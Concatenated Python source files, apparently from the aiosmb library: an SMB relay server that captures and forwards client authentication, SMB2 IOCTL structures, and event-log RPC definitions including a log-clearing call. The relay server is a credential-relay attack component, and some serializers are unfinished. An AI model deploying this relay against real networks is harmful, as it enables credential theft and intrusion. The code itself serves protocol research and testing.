import enum
import asyncio
import datetime
import traceback

from aiosmb import logger
from aiosmb.commons.exceptions import *
from aiosmb.protocol.smb.command_codes import SMBCommand
from aiosmb.wintypes.ntstatus import NTStatus
from aiosmb.protocol.smb.message import SMBMessage
from aiosmb.protocol.smb.commands import *
from aiosmb.protocol.smb2.message import SMB2Message
from aiosmb.protocol.smb2.commands import *
from aiosmb.protocol.smb2.headers import *
from aiosmb.protocol.smb2.command_codes import *
from aiosmb.protocol.common import *
from aiosmb.wintypes.dtyp.constrcuted_security.guid import *

from unicrypto import hmac
from unicrypto import hashlib


class SMBConnectionStatus(enum.Enum):
	NEGOTIATING = 'NEGOTIATING'
	SESSIONSETUP = 'SESSIONSETUP'
	RUNNING = 'RUNNING'
	CLOSED = 'CLOSED'
	

class SMBRelayServerConnection:
	def __init__(self, settings, connection, shutdown_evt = asyncio.Event()):
		self.settings = settings
		self.gssapi = self.settings.gssapi
		
		#######DONT CHANGE THIS
		#use this for smb2 > self.supported_dialects = [NegotiateDialects.WILDCARD, NegotiateDialects.SMB202, NegotiateDialects.SMB210]
		#self.supported_dialects = [NegotiateDialects.SMB202, NegotiateDialects.SMB210]
		self.supported_dialects = self.settings.preferred_dialects #[NegotiateDialects.WILDCARD, NegotiateDialects.SMB311]
		#######
		
		self.connection = connection
		self.incoming_task = None
		
		self.selected_dialect = None
		self.signing_required = self.settings.RequireSigning
		self.encryption_required = False
		self.last_treeid = 10
		
		self.status = SMBConnectionStatus.NEGOTIATING
		
		self.OutstandingResponsesEvent = {}
		self.OutstandingRequests = {}
		self.OutstandingResponses = {}

		self.pending_table = {}
		
		self.SequenceWindow = 0
		self.MaxTransactSize = self.settings.MaxTransactSize
		self.MaxReadSize = self.settings.MaxReadSize
		self.MaxWriteSize = self.settings.MaxWriteSize
		self.ServerGuid = self.settings.ServerGuid

		self.SupportsFileLeasing = False
		self.SupportsMultiCredit = False
		
		self.SupportsDirectoryLeasing = False
		self.SupportsMultiChannel = False
		self.SupportsPersistentHandles = False
		self.SupportsEncryption = False
		self.ClientCapabilities = 0
		self.ServerCapabilities = NegotiateCapabilities.DFS | NegotiateCapabilities.LARGE_MTU
		self.ClientSecurityMode = 0
		self.ServerSecurityMode = NegotiateSecurityMode.SMB2_NEGOTIATE_SIGNING_ENABLED
		if self.signing_required is True:
			self.ServerSecurityMode |= NegotiateSecurityMode.SMB2_NEGOTIATE_SIGNING_REQUIRED
		
		self.SessionId = 0
		self.SessionKey = None

	async def run(self):
		self.incoming_task = self.__handle_smb_in()
		await self.incoming_task

	async def __handle_smb_in(self):
		"""
		Waits from SMB message bytes from the transport in_queue, and fills the connection table.
		This function started automatically when calling connect.
		Pls don't touch it.
		"""
		try:
			async for msg_data in self.connection.read():
				if msg_data is None:
					break
				
				if msg_data[0] < 252:
					raise Exception('Unknown SMB packet type %s' % msg_data[0])

				if msg_data[0] == 0xFD:
					raise Exception('SMB2_COMPRESSED_DATA_HEADER is not implemented yet')

				if msg_data[0] == 0xFC:
					raise Exception('SMB2_COMPRESSED_TRANSFORM_HEADER is not implemented yet')
					
				if msg_data[0] == 0xFE:
					#version2
					msg = SMB2Message.from_bytes(msg_data)
					if self.status == SMBConnectionStatus.NEGOTIATING:
						await self.negotiate(msg)
					elif self.status == SMBConnectionStatus.SESSIONSETUP:
						await self.session_setup(msg)
					
					elif self.status == SMBConnectionStatus.RUNNING:
						if msg.header.Command == SMB2Command.TREE_CONNECT:
							await self.tree_connect(msg)
						elif msg.header.Command == SMB2Command.CREATE:
							await self.create(msg)
						elif msg.header.Command == SMB2Command.IOCTL:
							await self.ioctl(msg)
				
				if msg_data[0] == 0xFF:
					#version1
					msg = SMBMessage.from_bytes(msg_data)
					if self.status == SMBConnectionStatus.NEGOTIATING:
						if msg.header.Command == SMBCommand.SMB_COM_NEGOTIATE:
							await self.negotiate(msg)
					else:
						print('SMBv1 message recieved! This is unexpected! %s' % msg.header.Command)
						continue

				logger.log(1, '__handle_smb_in got new message with Id %s' % msg.header.MessageId)

				if msg.header.MessageId in self.pending_table:
					await self.pending_table[msg.header.MessageId].stop()
					del self.pending_table[msg.header.MessageId]
				
		except asyncio.CancelledError:
			return
		except:
			traceback.print_exc()
		
	async def negotiate(self, req):
		try:
			if (isinstance(req, SMBMessage) and 'SMB 2.???' in req.command.Dialects) or isinstance(req, SMB2Message):
					#if NegotiateDialects.WILDCARD in self.supported_dialects:
					reply = SMB2Message()
					reply.command = NEGOTIATE_REPLY()
					reply.command.SecurityMode = self.ServerSecurityMode
					reply.command.DialectRevision = NegotiateDialects.SMB202
					reply.command.NegotiateContextCount = 0
					reply.command.ServerGuid = self.ServerGuid
					reply.command.Capabilities = self.ServerCapabilities
					reply.command.MaxTransactSize = self.MaxTransactSize
					reply.command.MaxReadSize = self.MaxReadSize
					reply.command.MaxWriteSize = self.MaxWriteSize
					reply.command.SystemTime = datetime.datetime.utcnow()
					reply.command.ServerStartTime = datetime.datetime.utcnow()
					reply.command.SecurityBuffer = self.gssapi.get_mechtypes_list()
					reply.command.NegotiateContextOffset = 0
					reply.command.NegotiateContextList = []
					
					reply.header = SMB2Header_SYNC()
					reply.header.Command  = SMB2Command.NEGOTIATE
					reply.header.Flags = SMB2HeaderFlag.SMB2_FLAGS_SERVER_TO_REDIR
					reply.header.CreditCharge = 1
					await self.sendSMB(reply)

					self.selected_dialect = NegotiateDialects.SMB202

					
					self.SupportsMultiChannel = NegotiateCapabilities.MULTI_CHANNEL in self.ServerCapabilities
					self.SupportsFileLeasing = NegotiateCapabilities.LEASING in self.ServerCapabilities
					self.SupportsMultiCredit = NegotiateCapabilities.LARGE_MTU in self.ServerCapabilities
					
					self.status = SMBConnectionStatus.SESSIONSETUP
			return
		except Exception as e:
			traceback.print_exc()

	async def session_setup(self, msg):
		try:
			maxiter = 5
			if self.SessionId == 0:
				self.SessionId += 1
			while maxiter > 0:
				reply = SMB2Message()
				reply.command = SESSION_SETUP_REPLY()
				reply.command.SessionFlags = 0
				try:
					#reply.command.Buffer, to_continue, err  = await self.gssapi.authenticate(msg.command.Buffer)
					reply.command.Buffer, to_continue, err  = await self.gssapi.authenticate_relay_server(msg.command.Buffer)
					
					print('reply.command.Buffer: %s' % reply.command.Buffer)
					print('to_continue: %s' % to_continue)
					if err is not None:
						raise err
					
					if to_continue is False and reply.command.Buffer is None:
						return
					
				except Exception as e:
					logger.exception('GSSAPI auth failed!')
					#TODO: Clear this up, kerberos lib needs it's own exceptions!
					if str(e).find('Preauth') != -1:
						raise SMBKerberosPreauthFailed()
					else:
						raise e
						#raise SMBKerberosPreauthFailed()
				
				reply.header = SMB2Header_SYNC()
				reply.header.Command  = SMB2Command.SESSION_SETUP
				reply.header.Flags = SMB2HeaderFlag.SMB2_FLAGS_SERVER_TO_REDIR
				reply.header.SessionId = self.SessionId
				
				reply.header.CreditCharge = 1
				reply.header.CreditReq = 1
				reply.header.Status = NTStatus.SUCCESS if to_continue is False else NTStatus.MORE_PROCESSING_REQUIRED
				
				if to_continue is False:
					self.SessionKey = self.gssapi.get_session_key()[:16]
					reply.header.Flags |= SMB2HeaderFlag.SMB2_FLAGS_SIGNED
					reply.header.CreditReq = 127
					self.status = SMBConnectionStatus.RUNNING
				
				await self.sendSMB(reply)
				return
		except Exception as e:
			traceback.print_exc()
		
		finally:
			reply = SMB2Message()
			reply.command = SESSION_SETUP_REPLY()
			reply.command.SessionFlags = 0
			reply.command.Buffer = b''				
			reply.header = SMB2Header_SYNC()
			reply.header.Command  = SMB2Command.SESSION_SETUP
			reply.header.Flags = SMB2HeaderFlag.SMB2_FLAGS_SERVER_TO_REDIR
			reply.header.CreditReq = 0
			reply.header.Status = NTStatus.ACCESS_DENIED
			print(reply.header.Status)
			await self.sendSMB(reply)

	
	async def recvSMB(self, message_id, ret_data = False):
		"""
		Returns an SMB message from the outstandingresponse dict, OR waits until the expected message_id appears.
		"""
		if message_id not in self.OutstandingResponses:
			logger.log(1, 'Waiting on messageID : %s' % message_id)
			await self.OutstandingResponsesEvent[message_id].wait() #TODO: add timeout here?
			
		msg, msg_data = self.OutstandingResponses.pop(message_id)
		if msg is None:
			# this indicates and exception, so the msg_data is the exception
			raise msg_data
		
		if self.status != SMBConnectionStatus.NEGOTIATING:
			if self.selected_dialect != NegotiateDialects.SMB202:
				self.SequenceWindow += (msg.header.CreditCharge - 1)

		if msg.header.Status != NTStatus.PENDING:
			if message_id in self.OutstandingResponsesEvent:
				del self.OutstandingResponsesEvent[message_id]
		else:
			self.OutstandingResponsesEvent[message_id].clear()
		
		if ret_data is False:
			return msg
		return msg, msg_data
		
	async def sendSMB(self, msg, ret_message = False, compression_cb = None):
		"""
		Sends an SMB message to teh remote endpoint.
		msg: SMB2Message or SMBMessage
		Returns: MessageId integer
		"""
		if self.status == SMBConnectionStatus.NEGOTIATING:
			if isinstance(msg, SMBMessage):
				message_id = 0
				self.SequenceWindow += 1
			else:
				msg.header.CreditCharge = 1
				if msg.header.CreditReq is None:
					msg.header.CreditReq = 1
				msg.header.MessageId = self.SequenceWindow
				message_id = self.SequenceWindow
				self.SequenceWindow += 1

			self.OutstandingResponsesEvent[message_id] = asyncio.Event()
			await self.connection.write(msg.to_bytes())
			if ret_message is True:
				return message_id, msg
			return message_id
				
		print('RUNNING')
		print(self.signing_required)
		if msg.header.Command is not SMB2Command.CANCEL:
			msg.header.MessageId = self.SequenceWindow
			self.SequenceWindow += 1
		
		msg.header.SessionId = self.SessionId
		
		if not msg.header.CreditCharge:
			msg.header.CreditCharge = 0

		
		
		if self.status != SMBConnectionStatus.SESSIONSETUP:
			msg.header.CreditReq = 127
		
		message_id = msg.header.MessageId
		#print(msg)

		#creating an event for outstanding response
		self.OutstandingResponsesEvent[message_id] = asyncio.Event()
		await self.connection.write(msg.to_bytes())
		
		if ret_message is True:
				return message_id, msg
		return message_id

	


import io
import enum
import ipaddress
from os import stat

from aiosmb.protocol.smb2.commands.negotiate import NegotiateSecurityMode, NegotiateCapabilities
from aiosmb.protocol.common import NegotiateDialects

class CtlCode(enum.Enum):
	FSCTL_DFS_GET_REFERRALS = 0x00060194
	FSCTL_PIPE_PEEK = 0x0011400C
	FSCTL_PIPE_WAIT = 0x00110018
	FSCTL_PIPE_TRANSCEIVE = 0x0011C017
	FSCTL_SRV_COPYCHUNK = 0x001440F2
	FSCTL_SRV_ENUMERATE_SNAPSHOTS = 0x00144064
	FSCTL_SRV_REQUEST_RESUME_KEY = 0x00140078
	FSCTL_SRV_READ_HASH = 0x001441bb
	FSCTL_SRV_COPYCHUNK_WRITE = 0x001480F2
	FSCTL_LMR_REQUEST_RESILIENCY = 0x001401D4
	FSCTL_QUERY_NETWORK_INTERFACE_INFO = 0x001401FC
	FSCTL_SET_REPARSE_POINT = 0x000900A4
	FSCTL_DFS_GET_REFERRALS_EX = 0x000601B0
	FSCTL_FILE_LEVEL_TRIM = 0x00098208
	FSCTL_VALIDATE_NEGOTIATE_INFO = 0x00140204

class IOCTLREQFlags(enum.IntFlag):
	IS_IOCTL = 0
	IS_FSCTL = 1

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5c03c9d6-15de-48a2-9835-8fb37f8a79d8
class IOCTL_REQ:
	def __init__(self):
		self.StructureSize = 57
		self.Reserved  = 0
		self.CtlCode  = None #must be CtlCode
		self.FileId  = None #bytes
		self.InputOffset  = 0
		self.InputCount   = 0
		self.MaxInputResponse = 0
		self.OutputOffset = 0
		self.OutputCount = 0
		self.MaxOutputResponse = 65535
		self.Flags = IOCTLREQFlags.IS_IOCTL
		self.Reserved2 = 0
		
		self.Buffer = None

	def to_bytes(self):
		if self.CtlCode not in [CtlCode.FSCTL_PIPE_PEEK, CtlCode.FSCTL_SRV_ENUMERATE_SNAPSHOTS, CtlCode.FSCTL_SRV_REQUEST_RESUME_KEY, CtlCode.FSCTL_QUERY_NETWORK_INTERFACE_INFO]:
			self.InputOffset = 64 + 40 + 16
			self.InputCount = len(self.Buffer)


		t  = self.StructureSize.to_bytes(2, byteorder='little', signed = False)
		t += self.Reserved.to_bytes(2, byteorder='little', signed = False)
		t += self.CtlCode.value.to_bytes(4, byteorder='little', signed = False)
		t += self.FileId
		t += self.InputOffset.to_bytes(4, byteorder='little', signed = False)
		t += self.InputCount.to_bytes(4, byteorder='little', signed = False)
		t += self.MaxInputResponse.to_bytes(4, byteorder='little', signed = False)
		t += self.OutputOffset.to_bytes(4, byteorder='little', signed = False)
		t += self.OutputCount.to_bytes(4, byteorder='little', signed = False)
		t += self.MaxOutputResponse.to_bytes(4, byteorder='little', signed = False)
		t += self.Flags.to_bytes(4, byteorder='little', signed = False)
		t += self.Reserved2.to_bytes(4, byteorder='little', signed = False)
		if self.CtlCode not in [CtlCode.FSCTL_PIPE_PEEK, CtlCode.FSCTL_SRV_ENUMERATE_SNAPSHOTS, CtlCode.FSCTL_SRV_REQUEST_RESUME_KEY, CtlCode.FSCTL_QUERY_NETWORK_INTERFACE_INFO]:
			t += self.Buffer
		
		return t

	@staticmethod
	def from_bytes(bbuff):
		return IOCTL_REQ.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = IOCTL_REQ()
		msg.StructureSize = int.from_bytes(buff.read(2), byteorder='little')
		assert msg.StructureSize == 57
		msg.Reserved = int.from_bytes(buff.read(2), byteorder='little')
		msg.CtlCode = CtlCode(int.from_bytes(buff.read(4), byteorder='little'))
		msg.FileId = int.from_bytes(buff.read(16), byteorder='little')
		msg.InputOffset = int.from_bytes(buff.read(4), byteorder='little')
		msg.InputCount = int.from_bytes(buff.read(4), byteorder='little')
		msg.MaxInputResponse = int.from_bytes(buff.read(4), byteorder='little')
		msg.OutputOffset = int.from_bytes(buff.read(4), byteorder='little')
		msg.OutputCount = int.from_bytes(buff.read(4), byteorder='little')
		msg.MaxOutputResponse = int.from_bytes(buff.read(4), byteorder='little')
		msg.Flags = int.from_bytes(buff.read(4), byteorder='little')
		msg.Reserved2 = int.from_bytes(buff.read(4), byteorder='little')

		if msg.InputCount > 0:
			if msg.CtlCode == CtlCode.FSCTL_VALIDATE_NEGOTIATE_INFO:
				buff.seek(msg.InputOffset)
				data = buff.read(msg.InputCount)
				msg.Buffer = VALIDATE_NEGOTIATE_INFO_REQ.from_bytes(data)
			else:
				raise NotImplementedError()
		

		return msg

	def __repr__(self):
		t = '==== SMB2 IOCTL REQ ====\r\n'
		return t


class SRV_COPYCHUNK:
	def __init__(self):
		self.SourceOffset = None
		self.TargetOffset = None
		self.Length = None
		self.Reserved = 0

	def to_bytes(self):
		t  = self.SourceOffset.to_bytes(8, byteorder='little', signed = False)
		t += self.TargetOffset.to_bytes(8, byteorder='little', signed = False)
		t += self.Length.to_bytes(4, byteorder='little', signed = False)
		t += self.Reserved.to_bytes(4, byteorder='little', signed = False)

class SRV_COPYCHUNK_COPY:
	def __init__(self):
		self.SourceKey = None #24 bytes obtained from the server in a SRV_REQUEST_RESUME_KEY Response (section 2.2.32.3),
		self.ChunkCount = None
		self.Reserved = 0
		self.Chunks = []

	def to_bytes(self):
		self.ChunkCount = len(self.Chunks)
		
		t  = self.SourceKey
		t += self.ChunkCount.to_bytes(4, byteorder='little', signed = False)
		t += self.Reserved.to_bytes(4, byteorder='little', signed = False)
		for chunk in self.Chunks:
			t += chunk.to_bytes()

class SRV_HASH_TYPE(enum.Enum):
	SRV_HASH_TYPE_PEER_DIST = 0x01

class HashVersion(enum.Enum):
	SRV_HASH_VER_1 = 0x00000001 #Branch cache version 1.
	SRV_HASH_VER_2 = 0x00000002 #Branch cache version 2. This value is only applicable for the SMB 3.x dialect family.

class HashRetrievalType(enum.Enum):
	SRV_HASH_RETRIEVE_HASH_BASED = 0x00000001 #The Offset field in the SRV_READ_HASH request is relative to the beginning of the Content Information File.
	SRV_HASH_RETRIEVE_FILE_BASED = 0x00000002 #The Offset field in the SRV_READ_HASH request is relative to the beginning of the file indicated by the FileId field in the IOCTL request. This value is only applicable for the SMB 3.x dialect family.


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/9d154482-5532-4424-be11-18c578893aa9
# TODO
class SRV_READ_HASH:
	def __init__(self):
		self.HashType = None
		self.HashVersion = None
		self.HashRetrievalType = 0
		self.Length = None
		self.Offset = None

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/17061634-f8d5-4367-a058-9b4f4a5d4d3c
# TODO
class NETWORK_RESILIENCY_REQUEST:
	def __init__(self):
		self.Timeout = None #4bytres, miliseconds
		self.Reserved = 0 # 4 bytes zero

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/261ec397-d692-4e3e-8bcd-c96ce02bb969
class VALIDATE_NEGOTIATE_INFO_REQ:
	def __init__(self):
		self.Capabilities = None
		self.Guid = None
		self.SecurityMode = None
		self.DialectCount = None
		self.Dialects = []
	
	@staticmethod
	def from_bytes(data):
		return VALIDATE_NEGOTIATE_INFO_REQ.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = VALIDATE_NEGOTIATE_INFO_REQ()
		res.Capabilities = NegotiateCapabilities(int.from_bytes(buff.read(4), byteorder='little'))
		res.Guid = buff.read(16)
		res.SecurityMode = NegotiateSecurityMode(int.from_bytes(buff.read(2), byteorder='little'))
		res.DialectCount = int.from_bytes(buff.read(2), byteorder='little')
		for _ in range(res.DialectCount):
			res.Dialects.append(NegotiateDialects(int.from_bytes(buff.read(2), byteorder='little')))
		
		return res

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/9ace71ad-a6c1-4565-83d8-4cd9c9a92ea4
class VALIDATE_NEGOTIATE_INFO_REPLY:
	def __init__(self):
		self.Capabilities = None #The Capabilities of the server.
		self.Guid = None #The ServerGuid of the server.
		self.SecurityMode = None #The SecurityMode of the server.
		self.Dialect = None #The SMB2 dialect in use by the server on the connection.
	
	def to_bytes(self):
		t = self.Capabilities.to_bytes(4, byteorder='little', signed = False)
		t += self.Guid.to_bytes()
		t += self.SecurityMode.value.to_bytes(2, byteorder='little', signed = False)
		t += self.Dialect.value.to_bytes(2, byteorder='little', signed = False)

		return t

	@staticmethod
	def from_bytes(data):
		return VALIDATE_NEGOTIATE_INFO_REPLY.from_buffer(io.BytesIO(data))
	
	@staticmethod
	def from_buffer(buff):
		res = VALIDATE_NEGOTIATE_INFO_REPLY()
		res.Capabilities = NegotiateCapabilities(int.from_bytes(buff.read(4), byteorder='little'))
		res.Guid = buff.read(16)
		res.SecurityMode = NegotiateSecurityMode(int.from_bytes(buff.read(2), byteorder='little'))
		res.Dialect = NegotiateDialects(int.from_bytes(buff.read(2), byteorder='little'))
		
		return res

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/f70eccb6-e1be-4db8-9c47-9ac86ef18dbb
class IOCTL_REPLY:
	def __init__(self):
		self.StructureSize = 49
		self.Reserved  = 0
		self.CtlCode  = None #must be CtlCode
		self.FileId  = None #bytes
		self.InputOffset  = 0
		self.InputCount   = 0
		self.OutputOffset = 0
		self.OutputCount = 0
		self.Flags = 0
		self.Reserved2 = 0
		
		self.Buffer = None

	def to_bytes(self):
		t = self.StructureSize.to_bytes(2, byteorder='little', signed = False)
		t += self.Reserved.to_bytes(2, byteorder='little', signed = False)
		t += self.CtlCode.value.to_bytes(4, byteorder='little', signed = False)
		t += self.FileId
		t += self.InputOffset.to_bytes(4, byteorder='little', signed = False)
		t += self.InputCount.to_bytes(4, byteorder='little', signed = False)
		t += self.OutputOffset.to_bytes(4, byteorder='little', signed = False)
		t += self.OutputCount.to_bytes(4, byteorder='little', signed = False)
		t += self.Flags.to_bytes(4, byteorder='little', signed = False)
		t += self.Reserved2.to_bytes(4, byteorder='little', signed = False)
		t += self.Buffer
		return t


	@staticmethod
	def from_bytes(bbuff):
		return IOCTL_REPLY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = IOCTL_REPLY()
		msg.StructureSize = int.from_bytes(buff.read(2), byteorder='little')
		assert msg.StructureSize == 49
		msg.Reserved = int.from_bytes(buff.read(2), byteorder='little')
		msg.CtlCode = CtlCode(int.from_bytes(buff.read(4), byteorder='little'))
		msg.FileId = buff.read(16)
		msg.InputOffset = int.from_bytes(buff.read(4), byteorder='little')
		msg.InputCount = int.from_bytes(buff.read(4), byteorder='little')
		msg.OutputOffset = int.from_bytes(buff.read(4), byteorder='little')
		msg.OutputCount = int.from_bytes(buff.read(4), byteorder='little')
		msg.Flags = int.from_bytes(buff.read(4), byteorder='little')
		msg.Reserved2 = int.from_bytes(buff.read(4), byteorder='little')

		if msg.CtlCode == CtlCode.FSCTL_PIPE_WAIT:
			return msg
		elif msg.CtlCode == CtlCode.FSCTL_LMR_REQUEST_RESILIENCY:
			return msg
		elif msg.CtlCode == CtlCode.FSCTL_QUERY_NETWORK_INTERFACE_INFO:
			buff.seek(msg.OutputOffset)
			data = buff.read(msg.OutputCount)
			msg.Buffer = []
			while True:
				info = NETWORK_INTERFACE_INFO.from_bytes(data)
				msg.Buffer.append(info)
				if info.Next == 0:
					break
				data = data[info.Next:]
			return msg
		else:
			raise NotImplementedError()

	def __repr__(self):
		t = '==== SMB2 IOCTL REQ ====\r\n'
		return t

class NETWORK_INTERFACE_CAP(enum.IntFlag):
	RSS_CAPABLE = 0x00000001 #When set, specifies that the interface is RSS-capable.
	RDMA_CAPABLE = 0x00000002 #When set, specifies that the interface is RDMA-capable.

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/fcd862d1-1b85-42df-92b1-e103199f531f
class NETWORK_INTERFACE_INFO:
	def __init__(self):
		self.Next = None
		self.IfIndex = None
		self.Capability = None
		self.Reserved = None
		self.LinkSpeed = None
		self.SockAddr_Storage = None

	
	@staticmethod
	def from_bytes(bbuff):
		return NETWORK_INTERFACE_INFO.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = NETWORK_INTERFACE_INFO()
		msg.Next = int.from_bytes(buff.read(4), byteorder='little')
		msg.IfIndex = int.from_bytes(buff.read(4), byteorder='little')
		msg.Capability = NETWORK_INTERFACE_CAP(int.from_bytes(buff.read(4), byteorder='little'))
		msg.Reserved = int.from_bytes(buff.read(4), byteorder='little')
		msg.LinkSpeed = int.from_bytes(buff.read(8), byteorder='little')
		msg.SockAddr_Storage = SOCKADDR_STORAGE.from_bytes(buff.read(128))
		return msg
		
class SOCKADDR_STORAGE_FAMILY(enum.Enum):
	UNKONWN = 0x0000 #??????
	InterNetwork = 0x0002 #When set, indicates an IPv4 address in the socket.
	InterNetworkV6 = 0x0017 #When set, indicates an IPv6 address in the socket.

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/4b77102f-769f-414d-b137-47cabfe8be8f
class SOCKADDR_STORAGE:
	def __init__(self):
		self.Family = None
		self.Addr = None

	@staticmethod
	def from_bytes(bbuff):
		return SOCKADDR_STORAGE.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = SOCKADDR_STORAGE()
		msg.Family = SOCKADDR_STORAGE_FAMILY(int.from_bytes(buff.read(4), byteorder='little'))
		if msg.Family == SOCKADDR_STORAGE_FAMILY.InterNetwork:
			msg.Addr = ipaddress.ip_address(buff.read(4))
		if msg.Family == SOCKADDR_STORAGE_FAMILY.InterNetworkV6:
			msg.Addr = ipaddress.ip_address(buff.read(16))
		return msg

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/24bb31a3-72f4-4aa6-9296-1cfd3813d21a
class SRV_SNAPSHOT_ARRAY:
	def __init__(self):
		self.NumberOfSnapShots = None
		self.NumberOfSnapShotsReturned = None
		self.SnapShotArraySize = None
		self.SnapShots = []

	@staticmethod
	def from_bytes(bbuff):
		return SRV_SNAPSHOT_ARRAY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		msg = SRV_SNAPSHOT_ARRAY()
		msg.NumberOfSnapShots = int.from_bytes(buff.read(4), byteorder='little')
		msg.NumberOfSnapShotsReturned = int.from_bytes(buff.read(4), byteorder='little')
		msg.SnapShotArraySize = int.from_bytes(buff.read(4), byteorder='little')
		msg.SnapShots = int.from_bytes(buff.read(4), byteorder='little')
		return msg



# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author: Alberto Solino (@agsolino)
#         Itamar Mizrahi (@MrAnde7son)
#
# Description:
#   [MS-EVEN] Interface implementation
#
#   Best way to learn how to use these calls is to grab the protocol standard
#   so you understand what the call does, and then read the test case located
#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
#
#   Some calls have helper functions, which makes it even easier to use.
#   They are located at the end of this file.
#   Helper functions start with "h"<name of the call>.
#   There are test cases for them too.
#
from __future__ import division
from __future__ import print_function
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
from aiosmb.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
from aiosmb.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
from aiosmb.dcerpc.v5.structure import Structure
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin
from aiosmb.dcerpc.v5.rpcrt import DCERPCException

MSRPC_UUID_EVEN  = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))

class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)

################################################################################
# CONSTANTS
################################################################################
# 2.2.2 EventType
EVENTLOG_SUCCESS           = 0x0000
EVENTLOG_ERROR_TYPE        = 0x0001
EVENTLOG_WARNING_TYPE      = 0x0002
EVENTLOG_INFORMATION_TYPE  = 0x0004
EVENTLOG_AUDIT_SUCCESS     = 0x0008
EVENTLOG_AUDIT_FAILURE     = 0x0010

# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
#EVENTLOG_HANDLE_A
EVENTLOG_HANDLE_W = LPWSTR

# 2.2.9 Constants Used in Method Definitions
MAX_STRINGS      = 0x00000100
MAX_SINGLE_EVENT = 0x0003FFFF
MAX_BATCH_BUFF   = 0x0007FFFF

# 3.1.4.7 ElfrReadELW (Opnum 10)
EVENTLOG_SEQUENTIAL_READ = 0x00000001
EVENTLOG_SEEK_READ       = 0x00000002

EVENTLOG_FORWARDS_READ   = 0x00000004
EVENTLOG_BACKWARDS_READ  = 0x00000008

################################################################################
# STRUCTURES
################################################################################

class IELF_HANDLE(NDRSTRUCT):
	structure =  (
		('Data','20s=""'),
	)
	def getAlignment(self):
		return 1

# 2.2.3 EVENTLOGRECORD
class EVENTLOGRECORD(Structure):
	structure = (
		('Length','<L=0'),
		('Reserved','<L=0'),
		('RecordNumber','<L=0'),
		('TimeGenerated','<L=0'),
		('TimeWritten','<L=0'),
		('EventID','<L=0'),
		('EventType','<H=0'),
		('NumStrings','<H=0'),
		('EventCategory','<H=0'),
		('ReservedFlags','<H=0'),
		('ClosingRecordNumber','<L=0'),
		('StringOffset','<L=0'),
		('UserSidLength','<L=0'),
		('UserSidOffset','<L=0'),
		('DataLength','<L=0'),
		('DataOffset','<L=0'),
		('SourceName','z'),
		('Computername','z'),
		('UserSidPadding',':'),
		('_UserSid','_-UserSid', 'self["UserSidLength"]'),
		('UserSid',':'),
		('Strings',':'),
		('_Data','_-Data', 'self["DataLength"]'),
		('Data',':'),
		('Padding',':'),
		('Length2','<L=0'),
	)

# 2.2.4 EVENTLOG_FULL_INFORMATION
class EVENTLOG_FULL_INFORMATION(NDRSTRUCT):
	structure = (
		('dwFull', ULONG),
	)

# 2.2.8 RPC_CLIENT_ID
class RPC_CLIENT_ID(NDRSTRUCT):
	structure = (
		('UniqueProcess', ULONG),
		('UniqueThread', ULONG),
	)

# 2.2.12 RPC_STRING
class RPC_STRING(NDRSTRUCT):
	structure = (
		('Length','<H=0'),
		('MaximumLength','<H=0'),
		('Data',LPSTR),
	)

	def __setitem__(self, key, value):
		if key == 'Data' and isinstance(value, NDR) is False:
			self['Length'] = len(value)
			self['MaximumLength'] = len(value)
		return NDRSTRUCT.__setitem__(self, key, value)

	def dump(self, msg = None, indent = 0):
		if msg is None: msg = self.__class__.__name__
		if msg != '':
			print("%s" % msg, end=' ')

		if isinstance(self.fields['Data'] , NDRPOINTERNULL):
			print(" NULL", end=' ')
		elif self.fields['Data']['ReferentID'] == 0:
			print(" NULL", end=' ')
		else:
			return self.fields['Data'].dump('',indent)

################################################################################
# RPC CALLS
################################################################################
# 3.1.4.9 ElfrClearELFW (Opnum 0)
class ElfrClearELFW(NDRCALL):
	opnum = 0
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('BackupFileName', PRPC_UNICODE_STRING),
	)

class ElfrClearELFWResponse(NDRCALL):
	structure = (
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.11 ElfrBackupELFW (Opnum 1)
class ElfrBackupELFW(NDRCALL):
	opnum = 1
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('BackupFileName', RPC_UNICODE_STRING),
	)

class ElfrBackupELFWResponse(NDRCALL):
	structure = (
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.21 ElfrCloseEL (Opnum 2)
class ElfrCloseEL(NDRCALL):
	opnum = 2
	structure = (
		('LogHandle', IELF_HANDLE),
	)

class ElfrCloseELResponse(NDRCALL):
	structure = (
		('LogHandle', IELF_HANDLE),
		('ErrorCode', NTSTATUS),
	)

